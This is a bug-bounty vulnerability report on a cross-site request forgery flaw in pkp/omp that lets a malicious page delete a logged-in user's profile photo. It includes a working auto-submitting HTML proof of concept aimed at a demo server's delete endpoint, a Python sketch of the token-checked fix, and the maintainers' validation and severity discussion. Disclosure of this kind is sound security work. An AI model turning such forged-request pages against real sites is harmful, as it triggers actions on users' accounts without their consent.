Cross-Site Request Forgery (CSRF) in pkp/omp

Valid

Reported on

Oct 14th 2021


✍️ Description

An attacker or malicious user is able to delete any user's profile photo if a logged-in user visits the attacker's website, because the delete request lacks a CSRF token.

🕵️‍♂️ Proof of Concept

1. While logged in, open this POC.html in a browser.
2. Observe that your profile photo has been deleted without your intent.

//POC.html
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.publicknowledgeproject.org/omp3/demo/index.php/aup-demo/$$$call$$$/tab/user/profile-tab/delete-profile-image">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

💥 Impact

This vulnerability is capable of forcing a user to unintentionally delete their profile photo.

💥 Test

Tested on Firefox and Safari.

💥 Fix

You should require a CSRF token on this request.
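As an added illustration (not pkp-lib's own code), a minimal Python model of the hardened handler: the cookie-authenticated GET that the PoC form sends is refused, and the deletion only proceeds on a POST carrying the session's token. The `Session` and `Request` classes and the `csrfToken` parameter name are assumptions for this sketch.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Optional


@dataclass
class Session:
    """Constructed stand-in for the server-side session (assumption)."""
    user_id: int
    # Per-session secret the legitimate UI must echo back with each state change.
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(32))
    profile_image: Optional[str] = "avatar.png"


@dataclass
class Request:
    """Constructed stand-in for an incoming HTTP request (assumption)."""
    method: str
    params: dict
    # The browser attaches the session cookie automatically, even for a
    # cross-site form post; that is why the cookie alone proves nothing.
    session: Session


def csrf_ok(request: Request) -> bool:
    """True only if the request carries the session's CSRF token.

    A cross-site page cannot read the victim's token, so it cannot supply it.
    Constant-time comparison avoids leaking token bytes through timing.
    """
    supplied = request.params.get("csrfToken")
    if not supplied:
        return False
    return hmac.compare_digest(supplied, request.session.csrf_token)


def delete_profile_image(request: Request) -> dict:
    """Hardened handler: a state change needs POST plus a valid CSRF token.

    The vulnerable endpoint accepted a cookie-authenticated GET with no token,
    which is exactly what the PoC form exploits.
    """
    if request.method != "POST":
        return {"status": False, "error": "method not allowed"}
    if not csrf_ok(request):
        return {"status": False, "error": "invalid CSRF token"}
    request.session.profile_image = None
    return {"status": True}
```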

We have contacted a member of the pkp/omp team and are waiting to hear back 2 months ago
Alec Smecher validated this vulnerability 2 months ago
Musio has been awarded the disclosure bounty
The fix bounty is now up for grabs
Alec Smecher
2 months ago

Fix here: https://github.com/pkp/pkp-lib/issues/7380

This does not rate a "high" severity.

The cited "navigationMenus.xml" has nothing to do with the reported issue.

Alec Smecher confirmed that a fix has been merged on 1ae8e3 2 months ago
Alec Smecher has been awarded the fix bounty
navigationMenus.xml#L1-L41 has been validated
Musio
2 months ago

Researcher


Hi. I did many searches to find the flawed code but I can't find it, and the only file I found with profile/photo is navigationMenus.xml. I can't edit the severity now, but you're right, it's not high.